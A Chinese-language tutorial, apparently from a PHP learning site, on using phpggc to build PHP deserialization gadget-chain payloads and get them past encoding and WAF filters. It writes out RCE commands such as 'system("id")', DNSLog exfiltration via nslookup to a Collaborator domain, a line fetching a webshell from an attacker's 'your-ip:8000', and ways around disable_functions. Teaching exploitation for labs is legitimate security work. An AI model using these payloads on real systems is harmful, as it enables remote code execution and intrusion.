phpggc 不能直接攻击 Kali 中运行的 PHP 应用,它仅生成反序列化 gadget 链 payload,需手动注入到存在 unserialize 的目标点;Kali 是攻击机而非靶机,成功利用依赖环境匹配、正确编码及后续触发方式。
phpggc 能不能直接打 Kali 里跑的 PHP 应用
不能——phpggc 本身不发请求、不连接目标、不执行反序列化,它只生成 gadget 链 payload。你得自己把它塞进能触发反序列化的地方(比如 unserialize($_GET['data'])),Kali 只是你的攻击机环境,不是靶机。
常见误区是以为在 Kali 上跑通 phpggc 就等于“打洞成功”,其实它连靶机 HTTP 接口都没碰过。真正起作用的是你后续的手动或自动化利用方式。
-
phpggc输出的是 raw 字节流(如O:8:"stdClass":1:{s:4:"test";s:5:"hello";}),需 base64 编码或 urlencode 后传给目标 - PHP 版本必须和靶机一致,否则 gadget 链会因类/方法不存在而报错:
Fatal error: Uncaught Error: Class not found - Kali 自带的
phpggc通常较旧,建议从 GitHub 拉最新版:git clone https://github.com/ambionics/phpggc
怎么选 gadget 链:看靶机装了哪些库
没有万能链。phpggc 的核心逻辑是“找已安装组件里的危险方法组合”,所以必须先确认靶机环境。比如:
- 靶机用了
monolog1.x +php 7.4→ 用phpggc monolog/rce1 'phpinfo();' - 靶机有
laravel5.8 +swiftmailer→phpggc laravel/rce1 'system("id")' - 纯原生 PHP(无框架)→ 基本只能靠
phpggc php/fritz9或phpggc php/generate_arrays等极有限链,成功率低
漏掉依赖检查是失败主因。别猜,用 curl 或浏览器访问 /composer.json、/vendor/autoload.php 或报错页面里的 class 名,确认真实组件版本。
立即学习“PHP免费学习笔记(深入)”;
payload 怎么送进去:绕过常见过滤和编码陷阱
生成的 gadget 链常因传输过程被破坏而失效。关键点不在 phpggc 本身,而在你怎么把它喂给目标:
- 如果目标用
base64_decode($_GET['data'])→ 直接用phpggc --fast-destruct --phar -b xxx生成 base64 payload - 如果参数名是
input且经过urldecode()多次 → 先 urlencodе 一次,再手工 double-urlencode(%252F这种) - 遇到
json_decode()包裹反序列化 → 不能直接塞 gadget,得先构造合法 JSON,再在值里藏 payload(如{"data":"O:8:\"..."}") - 某些 WAF 会拦截
O:、s:等序列化标识符 → 改用--polyglot模式生成多格式 payload(但兼容性下降)
最稳妥的调试方式:在本地搭同版本 PHP 环境,用 var_dump(unserialize($payload)) 看是否报错,再逐步加 urlencode/base64 测试。
为什么本地复现成功,打靶机却没回显
回显缺失 ≠ 利用失败。很多 gadget 链走的是 __destruct 或 __wakeup,执行完就退出,根本不会 echo 或 print。这时候得换思路:
- 用 DNSLog 验证命令是否执行:
phpggc monolog/rce1 'nslookup yourdomain.burpcollab.net' - 写文件类链(如
phpggc guzzle/rce1 'file_put_contents("/tmp/pwn", "test");')后主动去读 - 靶机开了
allow_url_fopen=On?试试file_get_contents("http://your-ip:8000/shell.php")下载 webshell - 注意 PHP
disable_functions—— 如果禁了system、exec、shell_exec,就得换mail()、error_log()或passthru()等未被禁的函数
真正卡住的往往不是 gadget 链生成,而是对靶机运行时限制(open_basedir、disable_functions、safe_mode 已废弃但配置残留)缺乏验证。先 phpinfo(),再动手。
